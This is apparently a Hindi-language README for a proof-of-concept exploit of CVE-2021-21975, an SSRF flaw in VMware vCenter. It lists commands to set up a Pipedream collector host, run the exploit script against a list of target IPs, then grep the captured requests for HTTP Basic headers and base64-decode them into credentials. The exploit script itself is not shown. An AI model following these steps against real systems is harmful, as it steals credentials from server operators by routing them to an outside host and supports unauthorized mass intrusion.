
CVE-2021-21975 (VMware vCenter Server SSRF) के लिए अवधारणा-सिद्ध शोषण जो सर्वर-साइड अनुरोध जालसाजी का उपयोग करके HTTP बेसिक प्रमाणीकरण के माध्यम से base64-एन्कोडेड प्रमाण-पत्र लीक करता है।
#SSRF-POC - ssrf से क्रेड लीक
#पहले pd क्लाइंट कॉन्फ़िगर करें।
#अब ./pd deploy http-new-requests चलाएँ
#अब स्क्रिप्ट में pipedream HTTP अनुरोध उदाहरण: Randomstring.m.pipedream.net को बदलें
#इसे एक अलग टर्मिनल में चलाएँ - ./pd logs new-requests | tee -a req.txt
#और अब इसे दूसरे टर्मिनल में चलाएँ - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"यह एक प्रारंभिक प्रूफ ऑफ कॉन्सेप्ट है जो तब बनाया गया था जब यह कमजोरी महीनों पहले सार्वजनिक हुई थी, इसलिए इसे अपने जोखिम पर उपयोग करें।" :V
#श्रेय @wabaf3t @D0rkerDevil